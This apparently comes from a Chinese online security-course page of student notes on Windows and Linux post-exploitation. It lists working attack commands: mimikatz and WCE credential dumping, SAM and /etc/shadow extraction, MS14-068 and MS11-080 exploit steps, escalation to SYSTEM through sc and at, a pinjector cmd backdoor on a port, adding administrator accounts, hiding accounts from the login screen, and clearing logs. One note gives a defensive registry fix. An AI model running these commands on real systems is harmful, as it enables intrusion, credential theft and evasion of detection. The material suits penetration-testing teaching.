WMIC（windows管理框架）

• wmic nicconfig get ipaddress,macaddress

#读取ip，mac地址

• wmic computersystemget username

#查看当前登录账号名称

• wmic netlogin get name,lastlogon

#查看用户登录记录

• wmic process get caption, executablepath,commandline

#查看当前运行进程

• wmic process where name=“calc.exe" call terminate

#中止calc.exe进程

• wmic os get name,servicepackmajorversion

#提取系统servicepack版本

• wmic product get name,version

#查看当前系统安装了哪些软件

• wmic product where name=“name” call uninstall /nointeractive

#在后台删除name程序

• wmic share get /ALL

#查看共享文件夹

• wmic /node:"machinename" path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections"1“

#开启远程桌面

• wmic nteventlogget path,filename, writeable

#查看当前系统日志

敏感数据

Linux

• /etc ；/usr/local/etc #敏感配置路径

• /etc/passwd ；/etc/shadow #账号密码

• .ssh ；.gnupg #公私钥

• The e-mail and data files

• 业务数据库；身份认证服务器数据库

• /tmp

windows

• SAM 数据库；注册表文件

• %SYSTEMROOT%\repair\SAM

•%SYSTEMROOT%\System32\config\RegBack\SAM

• 业务数据库；身份认证数据库

• 临时文件目录

•UserProfile\AppData\Local\Microsoft\Windows\Temporary Internet Files\

[展开全文]

hippo · 2018-05-27 · WMIC和收集敏感数据 0

应用系统的配置文件

应用连接数据库的配置文件
后台服务运行账号

Linux

• /etc/resolv.conf

• /etc/passwd

• /etc/shadow #用户密码

• whoami and who –a #当前用户信息

• ifconfig -a, iptables -L -n, netstat –r

#配置，防火墙，网段信息

• uname –a, ps aux #查看补丁，内核信息

• dpkg -l| head #列出所有软件包

Windows

• ipconfig /all , ipconfig /displaydns, netstat -bnao , netstat –r

#所有网络配置参数，dns缓存，路由信息

• net view , net view /domain

#共享信息

• net user /domain, net user %username% /domain

#域的信息

• net accounts, net share

#当前开了哪些共享

• net localgroup administrators username /add

#将username用户加入管理员权限

• net group "Domain Controllers" /domain

#查看域控制器中的账号

• net share name$=C:\ /unlimited

#设置c盘根目录共享

• net user username /active:yes /domain

#激活用户（域中）

[展开全文]

hippo · 2018-05-27 · 基本信息收集 0

利用配置不当提权

icacls 查看程序权限

icacls c:\windows\*.exe /save perm /T

#perm是保存的文件名
#查看windows下权限不当的程序，如（FA;;;BU）即为普通用户有全部权限

将shell拷贝到程序目录下，伪装成正常程序的名字

[展开全文]

hippo · 2018-05-27 · 利用配置不当提权 0

取得域的管理员权限

搭建域环境：

域控制器只能是server的操作系统,win7,8,xp不可以

作为域控制器的server管理员账号在升级成域后自动提升为域管理员

server要设为静态ip

DNS要指向自己的ip

运行->输入dcpromo（域安装程序）

域控制器也作为dns服务器

将电脑加入域：

我的电脑->属性->计算机名称->更改

运行->输入dsa.msc（域管理工具）

（MS14-068）漏洞利用

1.生成shell

python 1876.py -u user@lab.com -s userSID -d 域控制器的ip

#user是域用户名，userSID是这个用户的SID（用whoami.exe /all可查看）

2.将minikatz和生成的文件TGT_user1@lab.com.ccache 拷贝到win7系统（目标机）

3.本地管理员登陆

• mimikatz.exe log "kerberos::ptc TGT_user@lab.com.ccache" exit

4.成功

[展开全文]

hippo · 2018-05-27 · 利用漏洞提权（二） 0

利用漏洞提权

>找漏洞利用代码

searchsploit ms11-080(漏洞)

pyinstaller
pywin32
以上俩工具是将python转换成exe

将漏洞利用代码文件(18176.py)放到pyinstaller文件夹下，pyinstaller文件夹放到python27文件夹下，

..\python.exe pyinstaller.py --onefile 18176.py

运行即可提权system

[展开全文]

hippo · 2018-05-26 · 利用漏洞提权（一） 0

fgdump 双击即可

mimikatz

mimikatz是由C语言编写的开源小工具，功能非常强大。它支持从Windows系统内存中提取明文密码、哈希、PIN码和Kerberos凭证，以及pass-the-hash、pass-the-ticket、build Golden tickets等数种黑客技术。

提取Windows系统的明文密码：

mimikatz.exe

::     #帮助信息  -h,？无效

privilege::debug #提升权限

sekurlsa::logonPasswords

event::clear #清除日志

event::drop #不再产生新日志

misc::cmd #启动cmd等服务

misc::wifi #查看电脑中存的wifi密码

token::whoami

token::list #列出所有用户

[展开全文]

hippo · 2018-05-26 · 其他工具 0

WCE(WINDOWS CREDENTIAL EDITOR)

windows身份验证编辑器

可以查看当前登录用户

>存放路径/usr/share/wce/

>wce-universal.exe -lv #通用版本列出详细信息

>wce-universal.exe -d #删除

>wce-universal.exe -g password

#计算密码hash

>wce-universal.exe -w #读取密码

>net user +用户名 #查看用户详细信息，所在组

>wce-universal.exe -i LUID -s 密码

#修改LUID的用户密码

如何防护WCE攻击？

打开注册表编辑器
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
双击右侧Security Packages
删除下面两个字符 #一定要把空行也删掉，不然注册表会报错
重启

tspkg #维护远程相关的明文密码

wdigest #维护明文密码

[展开全文]

hippo · 2018-05-25 · Windows Credential Editor 0

提权

本地提权

系统账号之间的权限隔离
- 操作系统安全的基础
- 用户空间
- 内核空间
系统账号
- 用户账号登陆时获取权限令牌
- 服务账号无需用户登陆已在后台启动服务
windows
- user
- Administrator
- system
linux
- user
- root

windows

sysinternals suite

admin提权为system

系统设置管理功能
sysinternal suite
- https://technet.microsoft.com/en-us/sysinternals/b545027
- psexec -i -s -d taskmgr
at 19:39 /interactive cmd
sc Create syscmd binPath=”cmd /k start” type=own type=interact
sc start syscmd

注入进程提权

键盘记录

keylogger
木马窃取

本地缓存密码

浏览器缓存的密码
- ie浏览器
- firefox
网络密码
无线密码
http://www.nirsoft.net
Dump SAM
- Pwdump
- /usr/share/windows-binaries/fadump/

其他工具

fgdump
mimikatz

利用漏洞提权

ms11-080
看吧592799
pyinstaller
pywin32
ms11-046

利用配置不当提权

基本信息收集

隐藏痕迹

禁止在登陆界面显示新建账号

reg add “hkey_local_machine/software/microsoft/windowsNT/currentversion/winlogon/specialaccounts/userlist” /v uname /treg_dword /d 0
del %windir%/*.log /a/s/q/f
history
日志
- auth.log / secure
- btmp / wtmp
- lastlog / faillog
  其他日志和hids等

[展开全文]

h0ryit · 2018-05-25 · 隐藏痕迹 0

LSA本地安全助手

传输过程都是密文，身份验证使用NTML协议

不同环境有不同安全包进行身份验证处理

例外：wdigest 会缓存明文密码，关机后才销毁

[展开全文]

hippo · 2018-05-25 · Windows身份认证 0

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages

的wdigest

[展开全文]

Akiya · 2018-05-25 · Windows Credential Editor 0

本地缓存密码

浏览器缓存的密码

• IE浏览器
• Firefox

网络密码

win7,win8：控制面板->用户账户和家庭安全->凭据管理器

无线密码

http://www.nirsoft.net

Dump SAM

• Pwdump （不稳定）
• /usr/share/windows-binaries/fgdump/

>输入Pwdump.exe localhost生成文件，使用ophcrack点击crack

>windows密码以：分为两段加密lmhash：ntmhash

windows其实不知道你输入的密码，只会保存密文格式，计算哈希值检查输入是否正确

[展开全文]

hippo · 2018-05-28 · 本地缓存密码 0

/usr/share/windows-binaries/fgdump/

Pwdump ：用来dump出操作系统保存的密码哈希

[展开全文]

Akiya · 2018-05-24 · 本地缓存密码 0

*DarkComet-RAT

[展开全文]

Akiya · 2018-05-24 · 键盘记录 0

Dsniff 和 Sniffpass 只会抓密码相关的数据包

[展开全文]

Akiya · 2018-05-24 · 抓包嗅探 0

抓包嗅探工具

Windows

Wireshark
Omnipeek
commview
Sniffpass（只抓密码相关的数据包）

Linux

• Tcpdump
• Wireshark
• Dsniff（只抓密码相关的数据包）

[展开全文]

hippo · 2018-05-24 · 抓包嗅探 0

《Windows Internal》

at命令 xp、2003才行，win7、win8不可以

sc 这个可以在win7、8使用

[展开全文]

Akiya · 2018-05-24 · ADMIN提权为SYSTEM 0

*Windows下权限的不完全包括

[展开全文]

Akiya · 2018-05-24 · 本地提权 0

注入进程提权

工具 - pinjector.exe

(相当于开了一个后门，隐蔽性极高，不会创建新的进程，很难发现)

pinjector.exe -p 656(pid) cmd 5555(端口)

#将pinjector.exe注入到656这个进程下，当外部连接5555端口时，系统会将cmd提交出去

[展开全文]

hippo · 2018-05-24 · 注入进程提权 0

ADMIN提权为SYSTEM

思路：利用windows中以system运行的程序进行操作，将系统提权

win xp、win2003

at 18:12(时间) /interactive cmd #以system身份启动cmd
启动taskmgr服务
杀掉explorer.exe进程（桌面）
新建explorer.exe进程

win7，win8

sc Create syscmd binPath- "cmd /K start" type- own type- interact

#创建syscmd系统服务

sc start syscmd #启动服务

使用工具

Sysinternals Suite中的PsExec程序

PsExec.exe -i -s cmd

[展开全文]

hippo · 2018-05-24 · ADMIN提权为SYSTEM 0

默认账号

windows

user
Administrator
System #最高权限

关系图示：

Linux

User
Root

[展开全文]

hippo · 2018-05-20 · 本地提权 0

提权

本地提权

windows

admin提权为system

注入进程提权

键盘记录

本地缓存密码

其他工具

利用漏洞提权

利用配置不当提权

基本信息收集

隐藏痕迹

禁止在登陆界面显示新建账号

授课教师

课程特色

最新学员

学员动态